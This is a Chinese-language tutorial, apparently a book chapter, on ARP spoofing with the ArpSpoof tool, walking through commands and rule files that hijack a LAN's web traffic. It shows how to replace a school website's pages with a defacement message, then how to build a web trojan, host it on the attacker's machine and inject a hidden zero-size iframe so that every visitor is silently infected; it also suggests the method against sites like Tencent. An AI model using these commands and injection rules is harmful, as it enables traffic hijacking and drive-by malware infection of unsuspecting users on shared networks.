ARP挂马***--嗅探欺骗的最恐怖方式
局域网内"交换型"网络环境中的嗅探***,利用的是ARP欺骗的原理,它是点对点地发生在3台主机(网关、欺骗主机与被欺骗主机)之间的。
然而在2007年初,以ARPSpoof工具为代表的新兴ARP欺骗技术发生了变化,直接针对网关进行欺骗,让通过网关访问网络的所有主机全被欺骗***,以造成网站被***的假象,或者直接访问到***网页。
也就是说,一对一的***技术发展为一对多的***模式。而且,新兴的ARP欺骗技术,不仅可以在局域网中使用,还被广泛地应用在Internet网络中,***目标的范围更加广泛。
---------------------------------------------------------------------------------------------------------------------
ARPSpoof欺骗 公司网页被黑挂马
ARPSpoof是一个ARP欺骗***工具,它的应用环境非常广泛。
首先,在普通的公司、企业或网吧等局域网中,无论是采用Hub集线器、路由器还是采用交换机组建的局域网都适用。其次,在光纤和宽带等Internet网络中,有许多用户采用静态分配IP地址的方式上网,即使用公共的网关IP地址,这类处于同一网段内的公网网络也会遭到***。
此外,在普通的Internet中也能应用ARP欺骗***。例如,***者要***腾讯网站,只需要***与腾讯网在同一网段的某台主机,然后运行ARPSpoof,就可以达到在腾讯网上挂马的目的。普通浏览网页的用户对此根本无能为力,只有依靠腾讯网站管理员在网关上安装ARP防火墙才可以防止此类***。
可见ARPSpoof的危害是如此的大。特别是***者在******过程中,只要进入了内网,就可以利用ARPSpoof进行ARP欺骗挂马***,从而让内网中的所有用户都被******。
***只需一步,即可完成内网***中的横向权限提升***。
1.网站被黑的假象
为了说明ARPSpoof的***原理,这里利用ARPSpoof进行一次网站被黑的欺骗***的操作。***的效果是,在局域网中让所有用户访问内部网站服务器时,网页上显示被******的信息。
1)查询网关与网站服务器的IP地址
在命令窗口中执行命令: 
 
  
  1. ipconfig /all 
 
  
 
   此命令是显示本机网络信息的。其中"Default Gateway"显示为"192.168.1.1",就是网关IP地址;本机IP地址为"192.168.1.8",如图8-39所示。 
  
 
  
 
   再执行命令: 
  
 
  
 
  
  1. ping 网站网址 
 
  

    即可知道要***的网站内网的IP地址,这里假设目标网站的IP地址为"192.168.1.8"。 
  
 
  
 
   2)生成欺骗规则 
  
 
  

    下载ARP欺骗工具"arpspoof 3.1b",打开命令窗口并进入程序所在的文件夹,执行如下命令(见图8-40): 
  
 
  
 
  
  1. arpspoof.exe /n 
 
  
 
   
 
(点击查看大图)图8-39  获得网关服务器的IP地址
 
   
 
(点击查看大图)图8-40  导出欺骗规则
命令执行成功后,会在当前文件夹中生成一个名为"job.txt"的文件,此文件是用于定义欺骗规则的。用记事本打开"job.txt"文件,在文件中可以看到如下内容: 
   
 
  
 
  
 
  
  1. ----  
  2. HTTP/1.  
  3. ----  
  4. HTTP/1.1 200 OK\r\nServer: CoolDiyer's Hack 
    IIS\r\nContent-Length: 27\r\nConnection:    
    close\r\nContent-Type: text/html\r\n\r\nHack
    by cooldiyer<noframes> 
  5. ---- 
 
  

    "HTTP/1"表示嗅探到数据包中的数据,"HTTP/1.1 200 OK\r\nServer: CoolDiyer's Hack IIS\r\nContent-Length: 27\r\nConnection: close\r\nContent-Type: text/html\r\n\r\nHack by cooldiyer<noframes>"表示要替换成的字符。也就是说,嗅探到"HTTP/1."数据后,自动将其替换为后者的内容。替换后在网页中显示"Hack by cooldiyer"字符串,并且可以将"cooldiyer"替换为任意名称,如图8-41所示,修改后保存文件。 
  
 
  
 
   
 
(点击查看大图)图8-41  修改的规则文件
该规则文件的书写格式为: 
   
 
  
 
  
 
  
  1. ----  
  2. 原字符串  
  3. ----  
  4. 替换后的字符串  
  5. ---- 
 
  

    可以用同样的格式书写多行替换字符。例如,修改成如下内容: 
   
 
  
 
  
 
  
  1. ----  
  2. <hea 
  3. ----  
  4. Hack by 冰河洗剑<noframes> 
  5. ----  
  6. <HEA 
  7. ----  
  8. Hack by 冰河洗剑<noframes> 
  9. ---- 
 
  

    该规则可将捕获到的网络数据包中的"<hea"或"<HEA",替换为"Hack by 冰河洗剑"的字样。如果用户对网页源代码编辑比较熟悉的话,就可以随心所欲地替换代码,以显示想要的效果。 
  
 
  
 
   3)欺骗*** 
  
 
  

    在命令行下执行命令(见图8-42): 
  
 
  
 
  
  1. arpspoof.exe /l 
 
  

    将会显示当前的网络配置信息,包括网卡的数目,以及网关与本机的IP地址。本机有两块网卡,选择用于欺骗***的网卡为"1.Realtek RTL8139",因此网卡序号为0。如果只有一块网卡,则网卡的序号直接为0。由此,可执行如下命令(见图8-43): 
  
 
  
 
  
  1. arpspoof.exe  192.168.1.1  192.168.1.8  80 1 1 /r job.txt 
 
  
 
   
 
(点击查看大图)图8-42  显示当前的网络配置信息
 
   
 
(点击查看大图)图8-43  执行ARP欺骗
 
  
 
  

    命令执行后即可开始嗅探欺骗***。当校园网内的计算机访问校园网站(192.168.1.8)时,都必须通过网关(192.168.1.1)转发数据,才能访问到校园网站。如果要终止ARP欺骗***,可以按【Ctrl+C】组合键,提示Reseting后,等待5秒钟,整个局域网即可恢复正常。 
  
 
  

    由于本机(192.168.1.198)正在进行ARP欺骗***,该欺骗代替了真正的校园网站,并且网关会将访问者计算机的数据转发到本机上。因此,在进行ARP欺骗***后,其他同学访问到的实际上是***者设置的数据--其他同学访问校园网站时,打开的网页不是真实的网页,而是被替换后的页面,如图8-44所示。 
  
 
  
 
   
 
(点击查看大图)图8-44  被黑网页
 
  
 
  
 
   2.内网挂马,ARP欺骗在***中的应用 
  
 
  

    ***者除了制造网站服务器被黑的假象外,还可以制造真正的***--使访问该网页的所有主机都被***程序***,让***者直接利用网页***提升权限并控制内网中所有的主机。 
  
 
  
 
   1)制作网页*** 
  
 
  

    首先,***者需要制作一个网页***,可以使用"微软Ani网页***生成器",如图8-45所示。在上方输入本机的IP地址,这里是" 
   http://192.168.1.198/";在下方输入***程序链接地址,这里***者直接在本地建立一个网站,因此***可以直接放在***主机上。 
  
 
  

    单击【生成网页***】按钮,即可在软件当前目录下生成3个文件:"index.htm"、"z1.jpg"、"z2.jpg",如图8-46所示。在"C:\"目录下新建一个名称为"WEB"的文件夹,将这3个文件和***程序都复制到"C:\WEB"文件夹中。 
  
 
  
 
   
 
(点击查看大图)图8-45  微软Ani网页***生成器
 
   
 
(点击查看大图)图8-46  生成的网页***
 
  
 
  
 
   2)建立***的网页服务 
  
 
  

    运行"紫雨轩 ASP Web 服务器 v1.0.4.10",如图8-47所示,这是一个小型的Web服务器软件。 
  
 
  

    单击工具栏中的【参数设置】按钮,在弹出的"参数设置"对话框中设置"根目录"为"C:\web",将"缺省文件"设置为"index.htm",其他项保持默认,单击【OK】按钮,完成设置,如图8-48所示。 
  
 
  
 
   
 
(点击查看大图)图8-47  紫雨轩 ASP Web 服务器
 
   
 
(点击查看大图)图8-48  "参数设置"对话框
在浏览器中输入本机的IP地址,按【Enter】键后即可打开***网页,如图8-49所示。这是一个空白网页,但是杀毒软件会在打开网页时提示警告,说明网页***成功建立。 
   
 
   
 
(点击查看大图)图8-49  网页***建立成功
 
  
 
  
 
   3)建立挂马规则 
  
 
  

    修改前面生成的"job.txt"文件,修改后的内容如下: 
   
 
  
 
  
 
  
  1. ----  
  2. </HTML> 
  3. ----  
  4. <iframe src=http://192.168.1.198/index.htm width=0 height=0></iframe></HTML> 
 
  

    保存该文件后,同样用上面的方法进行ARP欺骗,在命令行下执行命令(见图8-50): 
  
 
  
 
  
  1. arpspoof.exe  192.168.1.8  192.168.1.1  80 0 0 /r job.txt 
 
  
 
   
 
(点击查看大图)图8-50  ARP欺骗挂马***
执行该命令后,即使有人访问该网站服务器,也不会显示任何异常,打开的仍然是正常的网站网页,但网页***已经嵌入其中了。而且访问网站服务器上的任何一个网页文件都会中***病毒。